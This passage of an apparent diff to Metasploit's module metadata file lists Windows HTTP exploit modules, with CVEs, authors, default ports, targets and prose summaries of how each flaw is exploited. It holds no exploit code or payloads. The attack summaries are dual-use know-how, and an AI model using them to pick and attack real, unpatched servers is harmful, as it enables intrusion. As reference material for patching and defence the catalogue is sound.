+ "is_install_path": true, + "ref_name": "windows/http/oracle_endeca_exec", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/oracle_event_processing_upload": { + "name": "Oracle Event Processing FileUploadServlet Arbitrary File Upload", + "fullname": "exploit/windows/http/oracle_event_processing_upload", + "aliases": [], + "rank": 600, + "disclosure_date": "2014-04-21", + "type": "exploit", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits an arbitrary file upload vulnerability in Oracle Event Processing\n 11.1.1.7.0. The FileUploadServlet component, which requires no authentication, can be\n abused to upload a malicious file onto an arbitrary location due to a directory traversal\n flaw, and compromise the server. By default Oracle Event Processing uses a Jetty\n Application Server without JSP support, which limits the attack to WbemExec. The current\n WbemExec technique only requires arbitrary write to the file system, but at the moment the\n module only supports Windows 2003 SP2 or older.", + "references": [ + "CVE-2014-2424", + "ZDI-14-106", + "BID-66871", + "URL-http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": 9002, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Oracle Event Processing 11.1.1.7.0 / Windows 2003 SP2 through WMI" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/oracle_event_processing_upload.rb", + "is_install_path": true, + "ref_name": "windows/http/oracle_event_processing_upload", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/osb_uname_jlist": { + "name": "Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability", + "fullname": "exploit/windows/http/osb_uname_jlist", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-07-13", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits an authentication bypass vulnerability\n in login.php. In conjunction with the authentication bypass issue,\n the 'jlist' parameter in property_box.php can be used to execute\n arbitrary system commands.\n This module was tested against Oracle Secure Backup version 10.3.0.1.0", + "references": [ + "CVE-2010-0904", + "OSVDB-66338", + "ZDI-10-118" + ], + "platform": "Windows", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Universal" + ], + "mod_time": "2022-06-29 19:10:52 +0000", + "path": "/modules/exploits/windows/http/osb_uname_jlist.rb", + "is_install_path": true, + "ref_name": "windows/http/osb_uname_jlist", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/peercast_url": { + "name": "PeerCast URL Handling Buffer Overflow", + "fullname": "exploit/windows/http/peercast_url", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-03-08", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.", + "references": [ + "CVE-2006-1148", + "OSVDB-23777", + "BID-17040" + ], + "platform": "Windows", + "arch": "", + "rport": 7144, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows 2000 English SP0-SP4", + "Windows 2003 English SP0-SP1", + "Windows XP English SP0/SP1", + "Windows XP English SP0/SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/peercast_url.rb", + "is_install_path": true, + "ref_name": "windows/http/peercast_url", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/pgadmin_binary_path_api": { + "name": "pgAdmin Binary Path API RCE", + "fullname": "exploit/windows/http/pgadmin_binary_path_api", + "aliases": [], + "rank": 600, + "disclosure_date": "2024-03-28", + "type": "exploit", + "author": [ + "M.Selim Karahan", + "Mustafa Mutlu", + "Ayoub Mokhtar" + ], + "description": "pgAdmin <= 8.4 is affected by a Remote Code Execution (RCE)\n vulnerability through the validate binary path API. This vulnerability\n allows attackers to execute arbitrary code on the server hosting PGAdmin,\n posing a severe risk to the database management system's integrity and the security of the underlying data.\n\n Tested on pgAdmin 8.4 on Windows 10 both authenticated and unauthenticated.", + "references": [ + "CVE-2024-3116", + "URL-https://ayoubmokhtar.com/post/remote_code_execution_pgadmin_8.4-cve-2024-3116/", + "URL-https://www.vicarius.io/vsociety/posts/remote-code-execution-vulnerability-in-pgadmin-cve-2024-3116" + ], + "platform": "Windows", + "arch": "x64", + "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Target" + ], + "mod_time": "2025-04-11 15:55:46 +0000", + "path": "/modules/exploits/windows/http/pgadmin_binary_path_api.rb", + "is_install_path": true, + "ref_name": "windows/http/pgadmin_binary_path_api", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk", + "config-changes", + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/php_apache_request_headers_bof": { + "name": "PHP apache_request_headers Function Buffer Overflow", + "fullname": "exploit/windows/http/php_apache_request_headers_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-05-08", + "type": "exploit", + "author": [ + "Vincent Danen", + "juan vazquez " + ], + "description": "This module exploits a stack based buffer overflow in the CGI version of PHP\n 5.4.x before 5.4.3. The vulnerability is due to the insecure handling of the\n HTTP headers.\n\n This module has been tested against the thread safe version of PHP 5.4.2,\n from \"windows.php.net\", running with Apache 2.2.22 from \"apachelounge.com\".", + "references": [ + "CVE-2012-2329", + "OSVDB-82215", + "BID-53455", + "URL-http://www.php.net/archive/2012.php#id2012-05-08-1", + "URL-http://www.php.net/ChangeLog-5.php#5.4.3", + "URL-https://bugzilla.redhat.com/show_bug.cgi?id=820000" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows XP SP3 / Windows 2003 Server SP2 (No DEP) / PHP 5.4.2 Thread safe" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/php_apache_request_headers_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/php_apache_request_headers_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/php_cgi_arg_injection_rce_cve_2024_4577": { + "name": "PHP CGI Argument Injection Remote Code Execution", + "fullname": "exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577", + "aliases": [], + "rank": 600, + "disclosure_date": "2024-06-06", + "type": "exploit", + "author": [ + "Orange Tsai", + "watchTowr", + "sfewer-r7" + ], + "description": "This module exploits a PHP CGI argument injection vulnerability affecting PHP in certain configurations\n on a Windows target. A vulnerable configuration is locale dependant (such as Chinese or Japanese), such that\n the Unicode best-fit conversion scheme will unexpectedly convert a soft hyphen (0xAD) into a dash (0x2D)\n character. Additionally a target web server must be configured to run PHP under CGI mode, or directly expose\n the PHP binary. This issue has been fixed in PHP 8.3.8 (for the 8.3.x branch), 8.2.20 (for the 8.2.x branch),\n and 8.1.29 (for the 8.1.x branch). PHP 8.0.x and below are end of life and have note received patches.\n\n XAMPP is vulnerable in a default configuration, and we can target the /php-cgi/php-cgi.exe endpoint. To target\n an explicit .php endpoint (e.g. /index.php), the server must be configured to run PHP scripts in CGI mode.", + "references": [ + "CVE-2024-4577", + "URL-https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability-en/", + "URL-https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/" + ], + "platform": "PHP,Windows", + "arch": "php, cmd", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows PHP", + "Windows Command" + ], + "mod_time": "2024-06-13 15:10:14 +0000", + "path": "/modules/exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.rb", + "is_install_path": true, + "ref_name": "windows/http/php_cgi_arg_injection_rce_cve_2024_4577", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/plesk_mylittleadmin_viewstate": { + "name": "Plesk/myLittleAdmin ViewState .NET Deserialization", + "fullname": "exploit/windows/http/plesk_mylittleadmin_viewstate", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-05-15", + "type": "exploit", + "author": [ + "Spencer McIntyre", + "wvu " + ], + "description": "This module exploits a ViewState .NET deserialization vulnerability in\n web-based MS SQL Server management tool myLittleAdmin, for version 3.8\n and likely older versions, due to hardcoded parameters in\n the web.config file for ASP.NET.\n\n Popular web hosting control panel Plesk offers myLittleAdmin as an\n optional component that is selected automatically during \"full\"\n installation. This exploit caters to the Plesk target, though it\n should work fine against a standalone myLittleAdmin setup.\n\n Successful exploitation results in code execution as the user running\n myLittleAdmin, which is IUSRPLESK_sqladmin for Plesk and described as\n the \"SQL Admin MSSQL anonymous account.\"\n\n Tested on the latest Plesk Obsidian with optional myLittleAdmin 3.8.", + "references": [ + "CVE-2020-13166", + "URL-https://ssd-disclosure.com/ssd-advisory-mylittleadmin-preauth-rce/", + "URL-https://portswigger.net/daily-swig/mylittleadmin-has-a-big-unpatched-security-flaw" + ], + "platform": "Windows", + "arch": "cmd, x86, x64", + "rport": 8401, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command", + "Windows Dropper", + "PowerShell Stager" + ], + "mod_time": "2021-03-31 12:07:57 +0000", + "path": "/modules/exploits/windows/http/plesk_mylittleadmin_viewstate.rb", + "is_install_path": true, + "ref_name": "windows/http/plesk_mylittleadmin_viewstate", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/plex_unpickle_dict_rce": { + "name": "Plex Unpickle Dict Windows RCE", + "fullname": "exploit/windows/http/plex_unpickle_dict_rce", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-05-07", + "type": "exploit", + "author": [ + "h00die", + "Chris Lyne" + ], + "description": "This module exploits an authenticated Python unsafe pickle.load of a Dict file. An authenticated attacker\n can create a photo library and add arbitrary files to it. After setting the Windows only Plex variable\n LocalAppDataPath to the newly created photo library, a file named Dict will be unpickled, which causes\n an RCE as the user who started Plex.\n Plex_Token is required, to get it you need to log-in through a web browser, then check the requests to grab\n the X-Plex-Token header. See info -d for additional details.\n If an exploit fails, or is cancelled, Dict is left on disk, a new ALBUM_NAME will be required\n as subsuquent writes will make Dict-1, and not execute.", + "references": [ + "URL-https://github.com/tenable/poc/blob/master/plex/plex_media_server/auth_dict_unpickle_rce_exploit_tra_2020_32.py", + "URL-https://www.tenable.com/security/research/tra-2020-32", + "URL-http://support.plex.tv/articles/201105343-advanced-hidden-server-settings/", + "URL-https://forums.plex.tv/t/security-regarding-cve-2020-5741/586819", + "CVE-2020-5741" + ], + "platform": "Python", + "arch": "python", + "rport": 32400, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Target" + ], + "mod_time": "2021-08-27 17:15:33 +0000", + "path": "/modules/exploits/windows/http/plex_unpickle_dict_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/plex_unpickle_dict_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-restarts" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk", + "config-changes" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/privatewire_gateway": { + "name": "Private Wire Gateway Buffer Overflow", + "fullname": "exploit/windows/http/privatewire_gateway", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-06-26", + "type": "exploit", + "author": [ + "Michael Thumann " + ], + "description": "This exploits a buffer overflow in the ADMCREG.EXE used\n in the PrivateWire Online Registration Facility.", + "references": [ + "CVE-2006-3252", + "OSVDB-26861", + "BID-18647" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows 2000 English SP0", + "Windows 2000 English SP1", + "Windows 2000 English SP2", + "Windows 2000 English SP3", + "Windows 2000 English SP4", + "Windows 2003 English SP0/SP1", + "Debugging" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/privatewire_gateway.rb", + "is_install_path": true, + "ref_name": "windows/http/privatewire_gateway", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/prtg_authenticated_rce": { + "name": "PRTG Network Monitor Authenticated RCE", + "fullname": "exploit/windows/http/prtg_authenticated_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2018-06-25", + "type": "exploit", + "author": [ + "Josh Berry ", + "Julien Bedel " + ], + "description": "Notifications can be created by an authenticated user and can execute scripts when triggered.\n Due to a poorly validated input on the script name, it is possible to chain it with a user-supplied command allowing command execution under the context of privileged user.\n The module uses provided credentials to log in to the web interface, then creates and triggers a malicious notification to perform RCE using a Powershell payload.\n It may require a few tries to get a shell because notifications are queued up on the server.\n This vulnerability affects versions prior to 18.2.39. See references for more details about the vulnerability allowing RCE.", + "references": [ + "CVE-2018-9276", + "URL-https://www.codewatch.org/blog/?p=453" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Targeting" + ], + "mod_time": "2023-02-10 18:04:31 +0000", + "path": "/modules/exploits/windows/http/prtg_authenticated_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/prtg_authenticated_rce", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "screen-effects", + "config-changes", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/prtg_authenticated_rce_cve_2023_32781": { + "name": "PRTG CVE-2023-32781 Authenticated RCE", + "fullname": "exploit/windows/http/prtg_authenticated_rce_cve_2023_32781", + "aliases": [], + "rank": 600, + "disclosure_date": "2023-08-09", + "type": "exploit", + "author": [ + "Kevin Joensen " + ], + "description": "Authenticated RCE in Paessler PRTG", + "references": [ + "URL-https://baldur.dk/blog/prtg-rce.html", + "CVE-2023-32781" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows_Fetch", + "Windows_CMDStager" + ], + "mod_time": "2024-01-22 10:10:14 +0000", + "path": "/modules/exploits/windows/http/prtg_authenticated_rce_cve_2023_32781.rb", + "is_install_path": true, + "ref_name": "windows/http/prtg_authenticated_rce_cve_2023_32781", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/psoproxy91_overflow": { + "name": "PSO Proxy v0.91 Stack Buffer Overflow", + "fullname": "exploit/windows/http/psoproxy91_overflow", + "aliases": [], + "rank": 200, + "disclosure_date": "2004-02-20", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a buffer overflow in the PSO Proxy v0.91 web server.\n If a client sends an excessively long string the stack is overwritten.", + "references": [ + "CVE-2004-0313", + "OSVDB-4028", + "EDB-156", + "BID-9706" + ], + "platform": "Windows", + "arch": "", + "rport": 8080, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows 2000 Pro SP0-4 English", + "Windows 2000 Pro SP0-4 French", + "Windows 2000 Pro SP0-4 Italian", + "Windows XP Pro SP0/1 English", + "Windows XP Pro SP2 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/psoproxy91_overflow.rb", + "is_install_path": true, + "ref_name": "windows/http/psoproxy91_overflow", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/rabidhamster_r4_log": { + "name": "RabidHamster R4 Log Entry sprintf() Buffer Overflow", + "fullname": "exploit/windows/http/rabidhamster_r4_log", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-02-09", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in RabidHamster R4's web server.\n By supplying a malformed HTTP request, it is possible to trigger a stack-based\n buffer overflow when generating a log, which may result in arbitrary code\n execution under the context of the user.", + "references": [ + "OSVDB-79007", + "URL-http://aluigi.altervista.org/adv/r4_1-adv.txt" + ], + "platform": "Windows", + "arch": "", + "rport": 8888, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "R4 v1.25" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/http/rabidhamster_r4_log.rb", + "is_install_path": true, + "ref_name": "windows/http/rabidhamster_r4_log", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/rejetto_hfs_exec": { + "name": "Rejetto HttpFileServer Remote Command Execution", + "fullname": "exploit/windows/http/rejetto_hfs_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2014-09-11", + "type": "exploit", + "author": [ + "Daniele Linguaglossa ", + "Muhamad Fadzil Ramli " + ], + "description": "Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a\n poor regex in the file ParserLib.pas. This module exploits the HFS scripting commands by\n using '%00' to bypass the filtering. This module has been tested successfully on HFS 2.3b\n over Windows XP SP3, Windows 7 SP1 and Windows 8.", + "references": [ + "CVE-2014-6287", + "OSVDB-111386", + "URL-https://seclists.org/bugtraq/2014/Sep/85", + "URL-http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2021-05-09 12:40:48 +0000", + "path": "/modules/exploits/windows/http/rejetto_hfs_exec.rb", + "is_install_path": true, + "ref_name": "windows/http/rejetto_hfs_exec", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/rejetto_hfs_rce_cve_2024_23692": { + "name": "Rejetto HTTP File Server (HFS) Unauthenticated Remote Code Execution", + "fullname": "exploit/windows/http/rejetto_hfs_rce_cve_2024_23692", + "aliases": [], + "rank": 600, + "disclosure_date": "2024-05-25", + "type": "exploit", + "author": [ + "sfewer-r7", + "Arseniy Sharoglazov" + ], + "description": "The Rejetto HTTP File Server (HFS) version 2.x is vulnerable to an unauthenticated server side template\n injection (SSTI) vulnerability. A remote unauthenticated attacker can execute code with the privileges\n of the user account running the HFS.exe server process. This exploit has been tested to work against version\n 2.4.0 RC7 and 2.3m. The Rejetto HTTP File Server (HFS) version 2.x is no longer supported by the maintainers\n and no patch is available. Users are recommended to upgrade to newer supported versions.", + "references": [ + "CVE-2024-23692", + "URL-https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2024-06-11 16:26:04 +0000", + "path": "/modules/exploits/windows/http/rejetto_hfs_rce_cve_2024_23692.rb", + "is_install_path": true, + "ref_name": "windows/http/rejetto_hfs_rce_cve_2024_23692", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "screen-effects" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/sambar6_search_results": { + "name": "Sambar 6 Search Results Buffer Overflow", + "fullname": "exploit/windows/http/sambar6_search_results", + "aliases": [], + "rank": 300, + "disclosure_date": "2003-06-21", + "type": "exploit", + "author": [ + "hdm ", + "Andrew Griffiths ", + "aushack " + ], + "description": "This module exploits a buffer overflow found in the\n /search/results.stm application that comes with Sambar 6.\n This code is a direct port of Andrew Griffiths's SMUDGE\n exploit, the only changes made were to the nops and payload.\n This exploit causes the service to die, whether you provided\n the correct target or not.", + "references": [ + "CVE-2004-2086", + "OSVDB-5786", + "BID-9607" + ], + "platform": "Windows", + "arch": "x86", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows 2000", + "Windows XP" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/sambar6_search_results.rb", + "is_install_path": true, + "ref_name": "windows/http/sambar6_search_results", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/sap_configservlet_exec_noauth": { + "name": "SAP ConfigServlet Remote Code Execution", + "fullname": "exploit/windows/http/sap_configservlet_exec_noauth", + "aliases": [], + "rank": 500, + "disclosure_date": "2012-11-01", + "type": "exploit", + "author": [ + "Dmitry Chastuhin", + "Andras Kabai" + ], + "description": "This module allows remote code execution via operating system commands through the\n SAP ConfigServlet without any authentication. This module has been tested successfully\n with SAP NetWeaver 7.00 and 7.01 on Windows Server 2008 R2.", + "references": [ + "OSVDB-92704", + "EDB-24996", + "URL-http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf" + ], + "platform": "Windows", + "arch": "", + "rport": 50000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows generic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb", + "is_install_path": true, + "ref_name": "windows/http/sap_configservlet_exec_noauth", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/sap_host_control_cmd_exec": { + "name": "SAP NetWeaver HostControl Command Injection", + "fullname": "exploit/windows/http/sap_host_control_cmd_exec", + "aliases": [], + "rank": 200, + "disclosure_date": "2012-08-14", + "type": "exploit", + "author": [ + "Michael Jordon", + "juan vazquez " + ], + "description": "This module exploits a command injection vulnerability in the SAPHostControl\n Service, by sending a specially crafted SOAP request to the management console.\n\n In order to deal with the spaces and length limitations, a WebDAV service is\n created to run an arbitrary payload when accessed as a UNC path. Because of this,\n the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.\n It is enabled and automatically started by default on Windows XP SP3, but disabled\n by default on Windows 2003 SP2.", + "references": [ + "OSVDB-84821", + "URL-http://www.contextis.com/research/blog/sap4/", + "URL-https://websmp130.sap-ag.de/sap/support/notes/1341333" + ], + "platform": "Windows", + "arch": "", + "rport": 1128, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "SAP NetWeaver 7.02 SP6 / Windows with WebClient enabled" + ], + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/exploits/windows/http/sap_host_control_cmd_exec.rb", + "is_install_path": true, + "ref_name": "windows/http/sap_host_control_cmd_exec", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/sapdb_webtools": { + "name": "SAP DB 7.4 WebTools Buffer Overflow", + "fullname": "exploit/windows/http/sapdb_webtools", + "aliases": [], + "rank": 500, + "disclosure_date": "2007-07-05", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in SAP DB 7.4 WebTools.\n By sending an overly long GET request, it may be possible for\n an attacker to execute arbitrary code.", + "references": [ + "CVE-2007-3614", + "OSVDB-37838", + "BID-24773" + ], + "platform": "Windows", + "arch": "", + "rport": 9999, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "SAP DB 7.4 WebTools" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/sapdb_webtools.rb", + "is_install_path": true, + "ref_name": "windows/http/sapdb_webtools", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/savant_31_overflow": { + "name": "Savant 3.1 Web Server Overflow", + "fullname": "exploit/windows/http/savant_31_overflow", + "aliases": [], + "rank": 500, + "disclosure_date": "2002-09-10", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a stack buffer overflow in Savant 3.1 Web Server. The service\n supports a maximum of 10 threads (for a default install). Each exploit attempt\n generally causes a thread to die whether successful or not. Therefore, in a default\n configuration, you only have 10 chances.\n\n Due to the limited space available for the payload in this exploit module, use of the\n \"ord\" payloads is recommended.", + "references": [ + "CVE-2002-1120", + "OSVDB-9829", + "BID-5686", + "EDB-787" + ], + "platform": "Windows", + "arch": "x86", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Universal Savant.exe", + "Windows 2000 Pro All - English", + "Windows 2000 Pro All - Italian", + "Windows 2000 Pro All - French", + "Windows XP Pro SP2 - English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/savant_31_overflow.rb", + "is_install_path": true, + "ref_name": "windows/http/savant_31_overflow", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/sepm_auth_bypass_rce": { + "name": "Symantec Endpoint Protection Manager Authentication Bypass and Code Execution", + "fullname": "exploit/windows/http/sepm_auth_bypass_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2015-07-31", + "type": "exploit", + "author": [ + "Markus Wulftange", + "bperry" + ], + "description": "This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager\n in order to achieve a remote shell on the box as NT AUTHORITY\\SYSTEM. The vulnerabilities\n include an authentication bypass, a directory traversal and a privilege escalation to\n get privileged code execution.", + "references": [ + "CVE-2015-1486", + "CVE-2015-1487", + "CVE-2015-1489", + "URL-http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html" + ], + "platform": "Windows", + "arch": "", + "rport": 8443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/sepm_auth_bypass_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/sepm_auth_bypass_rce", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/serviio_checkstreamurl_cmd_exec": { + "name": "Serviio Media Server checkStreamUrl Command Execution", + "fullname": "exploit/windows/http/serviio_checkstreamurl_cmd_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2017-05-03", + "type": "exploit", + "author": [ + "Gjoko Krstic(LiquidWorm) ", + "bcoles " + ], + "description": "This module exploits an unauthenticated remote command execution vulnerability\n in the console component of Serviio Media Server versions 1.4 to 1.8 on\n Windows operating systems.\n\n The console service (on port 23423 by default) exposes a REST API which\n which does not require authentication.\n\n The 'action' API endpoint does not sufficiently sanitize user-supplied data\n in the 'VIDEO' parameter of the 'checkStreamUrl' method. This parameter is\n used in a call to cmd.exe resulting in execution of arbitrary commands.\n\n This module has been tested successfully on Serviio Media Server versions\n 1.4.0, 1.5.0, 1.6.0 and 1.8.0 on Windows 7.", + "references": [ + "OSVDB-41961", + "PACKETSTORM-142387", + 